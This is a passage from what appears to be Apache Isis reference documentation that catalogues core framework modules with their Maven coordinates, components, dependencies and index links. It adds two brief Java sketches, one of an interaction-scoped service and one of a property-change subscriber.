xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerForType.adoc[ExceptionRecognizerForType], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerService.adoc[ExceptionRecognizerService], xref:refguide:applib:index\/services\/exceprecog\/Recognition.adoc[Recognition], xref:refguide:applib:index\/services\/factory\/FactoryService.adoc[FactoryService], xref:refguide:applib:index\/services\/grid\/GridLoaderService.adoc[GridLoaderService], xref:refguide:applib:index\/services\/grid\/GridService.adoc[GridService], xref:refguide:applib:index\/services\/grid\/GridSystemService.adoc[GridSystemService], xref:refguide:applib:index\/services\/health\/Health.adoc[Health], xref:refguide:applib:index\/services\/health\/HealthCheckService.adoc[HealthCheckService], xref:refguide:applib:index\/services\/hint\/HintIdProvider.adoc[HintIdProvider], xref:refguide:applib:index\/services\/hint\/HintStore.adoc[HintStore], xref:refguide:applib:index\/services\/homepage\/HomePageResolverService.adoc[HomePageResolverService], xref:refguide:applib:index\/services\/i18n\/LocaleProvider.adoc[LocaleProvider], xref:refguide:applib:index\/services\/i18n\/Mode.adoc[Mode], xref:refguide:applib:index\/services\/i18n\/TranslatableString.adoc[TranslatableString], xref:refguide:applib:index\/services\/i18n\/TranslationService.adoc[TranslationService], xref:refguide:applib:index\/services\/i18n\/TranslationsResolver.adoc[TranslationsResolver], 
xref:refguide:applib:index\/services\/iactn\/ActionInvocation.adoc[ActionInvocation], xref:refguide:applib:index\/services\/iactn\/Execution.adoc[Execution], xref:refguide:applib:index\/services\/iactn\/ExecutionContext.adoc[ExecutionContext], xref:refguide:applib:index\/services\/iactn\/Interaction.adoc[Interaction], xref:refguide:applib:index\/services\/iactn\/InteractionContext.adoc[InteractionContext], xref:refguide:applib:index\/services\/iactn\/PropertyEdit.adoc[PropertyEdit], xref:refguide:applib:index\/services\/iactn\/SequenceType.adoc[SequenceType], xref:refguide:applib:index\/services\/inject\/ServiceInjector.adoc[ServiceInjector], xref:refguide:applib:index\/services\/jaxb\/JaxbService.adoc[JaxbService], xref:refguide:applib:index\/services\/layout\/LayoutService.adoc[LayoutService], xref:refguide:applib:index\/services\/layout\/LayoutServiceMenu.adoc[LayoutServiceMenu], xref:refguide:applib:index\/services\/layout\/Style.adoc[Style], xref:refguide:applib:index\/services\/linking\/DeepLinkService.adoc[DeepLinkService], xref:refguide:applib:index\/services\/menu\/MenuBarsLoaderService.adoc[MenuBarsLoaderService], xref:refguide:applib:index\/services\/menu\/MenuBarsService.adoc[MenuBarsService], xref:refguide:applib:index\/services\/message\/MessageService.adoc[MessageService], xref:refguide:applib:index\/services\/metamodel\/BeanSort.adoc[BeanSort], xref:refguide:applib:index\/services\/metamodel\/Config.adoc[Config], xref:refguide:applib:index\/services\/metamodel\/DomainMember.adoc[DomainMember], xref:refguide:applib:index\/services\/metamodel\/DomainModel.adoc[DomainModel], xref:refguide:applib:index\/services\/metamodel\/MetaModelService.adoc[MetaModelService], xref:refguide:applib:index\/services\/metamodel\/MetaModelServiceMenu.adoc[MetaModelServiceMenu], xref:refguide:applib:index\/services\/metrics\/MetricsService.adoc[MetricsService], xref:refguide:applib:index\/services\/publishing\/log\/CommandLogger.adoc[CommandLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityChangesLogger.adoc[EntityChangesLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityPropertyChangeLogger.adoc[EntityPropertyChangeLogger], xref:refguide:applib:index\/services\/publishing\/log\/ExecutionLogger.adoc[ExecutionLogger], xref:refguide:applib:index\/services\/publishing\/spi\/CommandSubscriber.adoc[CommandSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChanges.adoc[EntityChanges], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChangesSubscriber.adoc[EntityChangesSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChange.adoc[EntityPropertyChange], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChangeSubscriber.adoc[EntityPropertyChangeSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/ExecutionSubscriber.adoc[ExecutionSubscriber], xref:refguide:applib:index\/services\/queryresultscache\/MethodReferences.adoc[MethodReferences], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCache.adoc[QueryResultsCache], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCacheControl.adoc[QueryResultsCacheControl], xref:refguide:applib:index\/services\/registry\/InstanceByPriorityComparator.adoc[InstanceByPriorityComparator], xref:refguide:applib:index\/services\/registry\/ServiceRegistry.adoc[ServiceRegistry], xref:refguide:applib:index\/services\/repository\/EntityState.adoc[EntityState], 
xref:refguide:applib:index\/services\/repository\/RepositoryService.adoc[RepositoryService], xref:refguide:applib:index\/services\/routing\/RoutingService.adoc[RoutingService], xref:refguide:applib:index\/services\/scratchpad\/Scratchpad.adoc[Scratchpad], xref:refguide:applib:index\/services\/session\/SessionLoggingService.adoc[SessionLoggingService], xref:refguide:applib:index\/services\/session\/SessionLoggingServiceLogging.adoc[SessionLoggingServiceLogging], xref:refguide:applib:index\/services\/sudo\/SudoService.adoc[SudoService], xref:refguide:applib:index\/services\/swagger\/Format.adoc[Format], xref:refguide:applib:index\/services\/swagger\/SwaggerService.adoc[SwaggerService], xref:refguide:applib:index\/services\/swagger\/Visibility.adoc[Visibility], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderForCollectionTypeAbstract.adoc[TableColumnOrderForCollectionTypeAbstract], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderService.adoc[TableColumnOrderService], xref:refguide:applib:index\/services\/title\/TitleService.adoc[TitleService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingService.adoc[UrlEncodingService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingServiceUsingBaseEncodingAbstract.adoc[UrlEncodingServiceUsingBaseEncodingAbstract], xref:refguide:applib:index\/services\/user\/RoleMemento.adoc[RoleMemento], xref:refguide:applib:index\/services\/user\/UserMemento.adoc[UserMemento], xref:refguide:applib:index\/services\/user\/UserService.adoc[UserService], xref:refguide:applib:index\/services\/userprof\/UserProfileService.adoc[UserProfileService], xref:refguide:applib:index\/services\/userreg\/EmailNotificationService.adoc[EmailNotificationService], xref:refguide:applib:index\/services\/userreg\/UserDetails.adoc[UserDetails], xref:refguide:applib:index\/services\/userreg\/UserRegistrationService.adoc[UserRegistrationService], xref:refguide:applib:index\/services\/userreg\/events\/EmailEventAbstract.adoc[EmailEventAbstract], xref:refguide:applib:index\/services\/userreg\/events\/EmailRegistrationEvent.adoc[EmailRegistrationEvent], xref:refguide:applib:index\/services\/userreg\/events\/PasswordResetEvent.adoc[PasswordResetEvent], xref:refguide:applib:index\/services\/wrapper\/DisabledException.adoc[DisabledException], xref:refguide:applib:index\/services\/wrapper\/HiddenException.adoc[HiddenException], xref:refguide:applib:index\/services\/wrapper\/InvalidException.adoc[InvalidException], xref:refguide:applib:index\/services\/wrapper\/WrapperFactory.adoc[WrapperFactory], xref:refguide:applib:index\/services\/wrapper\/WrappingObject.adoc[WrappingObject], xref:refguide:applib:index\/services\/wrapper\/control\/AsyncControl.adoc[AsyncControl], xref:refguide:applib:index\/services\/wrapper\/control\/ControlAbstract.adoc[ControlAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandler.adoc[ExceptionHandler], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandlerAbstract.adoc[ExceptionHandlerAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExecutionMode.adoc[ExecutionMode], xref:refguide:applib:index\/services\/wrapper\/control\/SyncControl.adoc[SyncControl], xref:refguide:applib:index\/services\/wrapper\/events\/AccessEvent.adoc[AccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionArgumentEvent.adoc[ActionArgumentEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionInvocationEvent.adoc[ActionInvocationEvent], 
xref:refguide:applib:index\/services\/wrapper\/events\/ActionUsabilityEvent.adoc[ActionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionVisibilityEvent.adoc[ActionVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAccessEvent.adoc[CollectionAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAddToEvent.adoc[CollectionAddToEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionMethodEvent.adoc[CollectionMethodEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionRemoveFromEvent.adoc[CollectionRemoveFromEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionUsabilityEvent.adoc[CollectionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/InteractionEvent.adoc[InteractionEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectTitleEvent.adoc[ObjectTitleEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectValidityEvent.adoc[ObjectValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectVisibilityEvent.adoc[ObjectVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ParseValueEvent.adoc[ParseValueEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyAccessEvent.adoc[PropertyAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyModifyEvent.adoc[PropertyModifyEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyUsabilityEvent.adoc[PropertyUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyVisibilityEvent.adoc[PropertyVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ProposedHolderEvent.adoc[ProposedHolderEvent], xref:refguide:applib:index\/services\/wrapper\/events\/UsabilityEvent.adoc[UsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ValidityEvent.adoc[ValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/VisibilityEvent.adoc[VisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionAdapter.adoc[InteractionAdapter], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionListener.adoc[InteractionListener], xref:refguide:applib:index\/services\/xactn\/TransactionId.adoc[TransactionId], xref:refguide:applib:index\/services\/xactn\/TransactionService.adoc[TransactionService], xref:refguide:applib:index\/services\/xactn\/TransactionState.adoc[TransactionState], xref:refguide:applib:index\/services\/xactn\/TransactionalProcessor.adoc[TransactionalProcessor], xref:refguide:applib:index\/services\/xml\/XmlService.adoc[XmlService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService.adoc[XmlSnapshotService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot.adoc[XmlSnapshotService.Snapshot], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot~Builder.adoc[XmlSnapshotService.Snapshot.Builder], xref:refguide:applib:index\/snapshot\/SnapshottableWithInclusions.adoc[SnapshottableWithInclusions], xref:refguide:applib:index\/spec\/AbstractSpecification.adoc[AbstractSpecification], xref:refguide:applib:index\/spec\/AbstractSpecification2.adoc[AbstractSpecification2], xref:refguide:applib:index\/spec\/Specification.adoc[Specification], xref:refguide:applib:index\/spec\/Specification2.adoc[Specification2], xref:refguide:applib:index\/spec\/SpecificationAnd.adoc[SpecificationAnd], 
xref:refguide:applib:index\/spec\/SpecificationNot.adoc[SpecificationNot], xref:refguide:applib:index\/spec\/SpecificationOr.adoc[SpecificationOr], xref:refguide:applib:index\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:applib:index\/types\/MemberIdentifierType.adoc[MemberIdentifierType], xref:refguide:applib:index\/types\/TargetActionType.adoc[TargetActionType], xref:refguide:applib:index\/types\/TargetClassType.adoc[TargetClassType], xref:refguide:applib:index\/util\/Enums.adoc[Enums], xref:refguide:applib:index\/util\/Equality.adoc[Equality], xref:refguide:applib:index\/util\/Hashing.adoc[Hashing], xref:refguide:applib:index\/util\/JaxbUtil.adoc[JaxbUtil], xref:refguide:applib:index\/util\/ObjectContracts.adoc[ObjectContracts], xref:refguide:applib:index\/util\/ReasonBuffer.adoc[ReasonBuffer], xref:refguide:applib:index\/util\/ReasonBuffer2.adoc[ReasonBuffer2], xref:refguide:applib:index\/util\/Reasons.adoc[Reasons], xref:refguide:applib:index\/util\/TitleBuffer.adoc[TitleBuffer], xref:refguide:applib:index\/util\/TitleBufferException.adoc[TitleBufferException], xref:refguide:applib:index\/util\/ToString.adoc[ToString], xref:refguide:applib:index\/util\/schema\/ChangesDtoUtils.adoc[ChangesDtoUtils], xref:refguide:applib:index\/util\/schema\/CommandDtoUtils.adoc[CommandDtoUtils], xref:refguide:applib:index\/util\/schema\/CommonDtoUtils.adoc[CommonDtoUtils], xref:refguide:applib:index\/util\/schema\/InteractionDtoUtils.adoc[InteractionDtoUtils], xref:refguide:applib:index\/util\/schema\/MemberExecutionDtoUtils.adoc[MemberExecutionDtoUtils], xref:refguide:applib:index\/value\/Blob.adoc[Blob], xref:refguide:applib:index\/value\/Clob.adoc[Clob], xref:refguide:applib:index\/value\/HasHtml.adoc[HasHtml], xref:refguide:applib:index\/value\/LocalResourcePath.adoc[LocalResourcePath], xref:refguide:applib:index\/value\/Markup.adoc[Markup], xref:refguide:applib:index\/value\/NamedWithMimeType.adoc[NamedWithMimeType], xref:refguide:applib:index\/value\/OpenUrlStrategy.adoc[OpenUrlStrategy], xref:refguide:applib:index\/value\/Password.adoc[Password]\n****\n\n|Apache Isis Core - Code Gen (ByteBuddy)\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-codegen-bytebuddy\nType: jar\nDirectory: \/core\/codegen-bytebuddy\n----\n|Code generation using ByteBuddy.\n\n.Components\n****\no.a.i.core.codegen.bytebuddy.services.ProxyFactoryServiceByteBuddy +\n****\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.objenesis:objenesis:jar:<managed> +\n****\n\n|Apache Isis Core - Configuration\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-config\nType: jar\nDirectory: \/core\/config\n----\n|Isis configuration library for framework internal use.\n\n.Components\n****\no.a.i.core.config.applib.RestfulPathProvider +\no.a.i.core.config.beans.IsisBeanFactoryPostProcessorForSpring +\no.a.i.core.config.beans.IsisBeanTypeRegistryDefault +\no.a.i.core.config.converters.PatternsConverter +\no.a.i.core.config.datasources.DataSourceIntrospectionService +\no.a.i.core.config.environment.IsisLocaleInitializer +\no.a.i.core.config.environment.IsisSystemEnvironment +\no.a.i.core.config.environment.IsisTimeZoneInitializer +\no.a.i.core.config.validators.PatternOptionalStringConstraintValidator +\no.a.i.core.config.viewer.wicket.WebAppContextPath +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> 
+\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/config\/datasources\/DataSourceIntrospectionService.adoc[DataSourceIntrospectionService]\n****\n\n|Apache Isis Core - Interaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-interaction\nType: jar\nDirectory: \/core\/interaction\n----\n|Provides _Interaction Scope_.\nTop-level action executions or property changes are wrapped in an _Interaction_.\nThat typically corresponds to an HTTP request\/response cycle or a JUnit test method execution.\n\n.Components\n****\no.a.i.core.interaction.integration.InteractionAwareTransactionalBoundaryHandler +\no.a.i.core.interaction.scope.InteractionScopeBeanFactoryPostProcessor +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/interaction\/session\/InteractionFactory.adoc[InteractionFactory]\n****
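\n\nAs a minimal sketch of what _Interaction Scope_ enables (the class and member names here are hypothetical, not framework code): a Spring-managed service bound to the current _Interaction_ via the applib's xref:refguide:applib:index\/annotation\/InteractionScope.adoc[InteractionScope] annotation, so that its state lives exactly as long as one top-level execution.\n\n[source,java]\n----\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.function.Function;\n\nimport org.springframework.stereotype.Service;\n\nimport org.apache.isis.applib.annotation.InteractionScope;\n\n@Service\n@InteractionScope \/\/ one instance per Interaction, e.g. per HTTP request or per test method\npublic class PerInteractionCache {\n\n    private final Map<String, Object> values = new HashMap<>();\n\n    \/\/ caches a computed value for the duration of the current Interaction;\n    \/\/ the instance (and its map) is discarded once the Interaction completes\n    public Object computeIfAbsent(final String key, final Function<String, Object> loader) {\n        return values.computeIfAbsent(key, loader);\n    }\n}\n----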
\n\n|Apache Isis Core - Unit Test Support\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-internaltestsupport\nType: jar\nDirectory: \/core\/internaltestsupport\n----\n|Support for writing unit tests in either JUnit 4 or JUnit 5; should be added as a dependency with scope=test only.\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mockito:mockito-core:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n|Apache Isis Core - MetaModel\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-metamodel\nType: jar\nDirectory: \/core\/metamodel\n----\n|.Components\n****\no.a.i.core.metamodel.facets.schema.IsisSchemaMetaModelRefiner +\no.a.i.core.metamodel.facets.schema.IsisSchemaValueTypeProvider +\no.a.i.core.metamodel.objectmanager.ObjectManagerDefault +\no.a.i.core.metamodel.progmodel.ProgrammingModelInitFilterDefault +\no.a.i.core.metamodel.services.ServiceInjectorDefault +\no.a.i.core.metamodel.services.appfeat.ApplicationFeatureRepositoryDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForCollections +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForDomainObjects +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorRegistry +\no.a.i.core.metamodel.services.events.MetamodelEventService +\no.a.i.core.metamodel.services.exceprecog.ExceptionRecognizerForRecoverableException +\no.a.i.core.metamodel.services.grid.GridLoaderServiceDefault +\no.a.i.core.metamodel.services.grid.GridReaderUsingJaxb +\no.a.i.core.metamodel.services.grid.GridServiceDefault +\no.a.i.core.metamodel.services.grid.bootstrap3.GridSystemServiceBS3 +\no.a.i.core.metamodel.services.layout.LayoutServiceDefault +\no.a.i.core.metamodel.services.metamodel.MetaModelServiceDefault +\no.a.i.core.metamodel.services.registry.ServiceRegistryDefault +\no.a.i.core.metamodel.services.tablecol.TableColumnOrderServiceDefault +\no.a.i.core.metamodel.services.title.TitleServiceDefault +\no.a.i.core.metamodel.specloader.InjectorMethodEvaluatorDefault +\no.a.i.core.metamodel.specloader.ProgrammingModelServiceDefault +\no.a.i.core.metamodel.specloader.SpecificationLoaderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForBuiltin +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForCollections +\no.a.i.core.metamodel.valuetypes.ValueTypeRegistry +\n****\n\n.Dependencies\n****\nio.swagger:swagger-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/metamodel\/services\/command\/CommandDtoFactory.adoc[CommandDtoFactory], xref:refguide:core:index\/metamodel\/services\/ixn\/InteractionDtoFactory.adoc[InteractionDtoFactory], xref:refguide:core:index\/metamodel\/services\/publishing\/CommandPublisher.adoc[CommandPublisher], xref:refguide:core:index\/metamodel\/services\/publishing\/ExecutionPublisher.adoc[ExecutionPublisher]\n****\n\n|Apache Isis Core - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtime\nType: jar\nDirectory: \/core\/runtime\n----\n|Bundles framework internal services, utilities and events.\n\n.Components\n****\no.a.i.core.runtime.events.MetamodelEventService +\no.a.i.core.runtime.events.TransactionEventEmitter +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\n****\n\n|Apache Isis Core - Runtime Services\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtimeservices\nType: jar\nDirectory: \/core\/runtimeservices\n----\n|Introduced to keep the 'runtime' package concise.\n
Viewers don't have dependencies on this module.\n\n.Components\n****\no.a.i.core.runtimeservices.bookmarks.BookmarkServiceDefault +\no.a.i.core.runtimeservices.clock.ClockServiceDefault +\no.a.i.core.runtimeservices.command.CommandDtoFactoryDefault +\no.a.i.core.runtimeservices.command.CommandExecutorServiceDefault +\no.a.i.core.runtimeservices.confmenu.ConfigurationViewServiceDefault +\no.a.i.core.runtimeservices.email.EmailServiceDefault +\no.a.i.core.runtimeservices.eventbus.EventBusServiceSpring +\no.a.i.core.runtimeservices.executor.MemberExecutorServiceDefault +\no.a.i.core.runtimeservices.factory.FactoryServiceDefault +\no.a.i.core.runtimeservices.homepage.HomePageResolverServiceDefault +\no.a.i.core.runtimeservices.i18n.po.TranslationServicePo +\no.a.i.core.runtimeservices.interaction.InteractionDtoFactoryDefault +\no.a.i.core.runtimeservices.jaxb.JaxbServiceDefault +\no.a.i.core.runtimeservices.menubars.MenuBarsLoaderServiceDefault +\no.a.i.core.runtimeservices.menubars.bootstrap3.MenuBarsServiceBS3 +\no.a.i.core.runtimeservices.message.MessageServiceDefault +\no.a.i.core.runtimeservices.publish.CommandPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityChangesPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityPropertyChangePublisherDefault +\no.a.i.core.runtimeservices.publish.ExecutionPublisherDefault +\no.a.i.core.runtimeservices.queryresultscache.QueryResultsCacheDefault +\no.a.i.core.runtimeservices.recognizer.ExceptionRecognizerServiceDefault +\no.a.i.core.runtimeservices.recognizer.dae.ExceptionRecognizerForDataAccessException +\no.a.i.core.runtimeservices.repository.RepositoryServiceDefault +\no.a.i.core.runtimeservices.routing.RoutingServiceDefault +\no.a.i.core.runtimeservices.scratchpad.ScratchpadDefault +\no.a.i.core.runtimeservices.session.InteractionFactoryDefault +\no.a.i.core.runtimeservices.sudo.SudoServiceDefault +\no.a.i.core.runtimeservices.transaction.TransactionServiceSpring +\no.a.i.core.runtimeservices.urlencoding.UrlEncodingServiceWithCompression +\no.a.i.core.runtimeservices.user.UserServiceDefault +\no.a.i.core.runtimeservices.userprof.UserProfileServiceDefault +\no.a.i.core.runtimeservices.userreg.EmailNotificationServiceDefault +\no.a.i.core.runtimeservices.wrapper.WrapperFactoryDefault +\no.a.i.core.runtimeservices.xml.XmlServiceDefault +\no.a.i.core.runtimeservices.xmlsnapshot.XmlSnapshotServiceDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/runtimeservices\/transaction\/TransactionServiceSpring.adoc[TransactionServiceSpring], xref:refguide:core:index\/runtimeservices\/xml\/XmlServiceDefault.adoc[XmlServiceDefault]\n****\n\n|Apache Isis Core - Security\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-security\nType: jar\nDirectory: \/core\/security\n----\n|.Components\n****\no.a.i.core.security.authentication.manager.AuthenticationManager +\no.a.i.core.security.authentication.standard.RandomCodeGeneratorDefault +\no.a.i.core.security.authorization.manager.AuthorizationManager +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> 
+\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/security\/authentication\/Authentication.adoc[Authentication], xref:refguide:core:index\/security\/authentication\/AuthenticationRequest.adoc[AuthenticationRequest], xref:refguide:core:index\/security\/authentication\/Authenticator.adoc[Authenticator], xref:refguide:core:index\/security\/authorization\/Authorizor.adoc[Authorizor]\n****\n\n|Apache Isis Core - Transaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-transaction\nType: jar\nDirectory: \/core\/transaction\n----\n|Provides transaction integration with Spring, as well as\nentity change tracking with associated publishing and pre\/post value events.\n\n.Components\n****\no.a.i.core.transaction.changetracking.EntityChangeTrackerDefault +\no.a.i.core.transaction.changetracking.events.TimestampService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/transaction\/changetracking\/EntityChangeTracker.adoc[EntityChangeTracker], xref:refguide:core:index\/transaction\/changetracking\/EntityChangeTrackerDefault.adoc[EntityChangeTrackerDefault], xref:refguide:core:index\/transaction\/changetracking\/EntityChangesPublisher.adoc[EntityChangesPublisher], xref:refguide:core:index\/transaction\/changetracking\/EntityPropertyChangePublisher.adoc[EntityPropertyChangePublisher], xref:refguide:core:index\/transaction\/events\/TransactionAfterCompletionEvent.adoc[TransactionAfterCompletionEvent]\n****
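\n\nAs a minimal sketch of consuming the pre\/post values that this change tracking publishes (a sketch under stated assumptions, not framework code): a Spring service implementing the applib's xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChangeSubscriber.adoc[EntityPropertyChangeSubscriber] SPI, in the manner of the framework's own EntityPropertyChangeLogger. The callback and accessor names below are assumptions; verify them against the SPI's index entry for your version.\n\n[source,java]\n----\nimport org.springframework.stereotype.Service;\n\nimport org.apache.isis.applib.services.publishing.spi.EntityPropertyChange;\nimport org.apache.isis.applib.services.publishing.spi.EntityPropertyChangeSubscriber;\n\n@Service\npublic class AuditingPropertyChangeSubscriber implements EntityPropertyChangeSubscriber {\n\n    @Override\n    public boolean isEnabled() {\n        return true; \/\/ assumed guard method on the SPI\n    }\n\n    @Override\n    public void onChanging(final EntityPropertyChange change) {\n        \/\/ pre\/post values captured by EntityChangeTrackerDefault arrive here,\n        \/\/ once per changed property per transaction (accessor names assumed)\n        System.out.printf(\"%s#%s: %s -> %s%n\",\n                change.getTarget(), change.getPropertyId(),\n                change.getPreValue(), change.getPostValue());\n    }\n}\n----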
\n\n|Apache Isis Core - WebApp\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-webapp\nType: jar\nDirectory: \/core\/webapp\n----\n|Bundles all the web-specific classes as required by viewers.\nIntroduced to keep the 'runtime' package concise.\n\n.Components\n****\no.a.i.core.webapp.health.HealthIndicatorUsingHealthCheckService +\no.a.i.core.webapp.modules.logonlog.WebModuleLogOnExceptionLogger +\no.a.i.core.webapp.modules.templresources.WebModuleTemplateResources +\no.a.i.core.webapp.webappctx.IsisWebAppContextInitializer +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\norg.springframework.boot:spring-boot:jar:<managed> +\norg.springframework.boot:spring-boot-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-thymeleaf:jar:<managed> +\n****\n\n|Apache Isis - JDK Supplemental\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-jdk-supplemental\nType: pom\nDirectory: \/core\/jdk-supplemental\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed in later JDK versions.\n\nWill be removed once the framework migrates to Java 11 as the required\nminimum version.\n\n.Dependencies\n****\ncom.fasterxml.woodstox:woodstox-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-impl:jar:<managed> +\ncom.sun.xml.ws:jaxws-ri:pom:<managed> +\ncom.sun.xml.ws:jaxws-rt:jar:${jaxws-ri.version} +\njavax.xml.bind:jaxb-api:jar:<managed> +\norg.codehaus.woodstox:stax2-api:jar:<managed> 